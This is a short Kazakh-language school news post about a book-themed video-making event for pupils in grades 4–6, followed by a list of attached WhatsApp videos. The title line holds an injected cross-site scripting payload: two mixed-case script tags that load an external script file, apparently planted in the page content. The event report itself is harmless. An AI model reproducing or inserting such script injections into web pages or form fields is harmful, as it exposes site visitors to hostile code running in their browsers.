"Ғажайып кітаптар әлемі, неткен ғажап"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
06.11.2020
Талапкер ауылы №3 орта мектебінің 2020-2021 оқу жылына арналған күзгі демалыс жоспарына сәйкес, 6-шы қараша күні "Ғажайып кітаптар әлемі, неткен ғажап" тақырыбында оқушылар оқыған кітаптары туралы бейнеролик жасау іс-шарасы өткізілді. 4-6 сыныптар аталған іс-шараға белсенді қатысты. Компьютерлік технологияның даму дәуірінде балалар мен жасөспірімдердің басым көпшілігі уақыттарын теледидарды көруге, компьютерде ойнауға, музыка тыңдауға арнайды. Көптеген оқушылар дамып келе жатқан техниканы жақсы біледі, бірақ 4-6 сынып оқушылары өз роликтерінде кітап адамзат баласына білім беретінін көрсетті, өздерінің сүйікті жазушылары, сүйікті кейіпкерлері туралы қызықтыра айта білді.
Просмотров: 756
Қосымшалар:
- 2 - whatsapp_video_2020_11_06_at_143805.mp4 7.52 Mb
- 3 - whatsapp_video_2020_11_06_at_143805_2.mp4 10.62 Mb
- 4 - whatsapp_video_2020_11_06_at_090330.mp4 15.88 Mb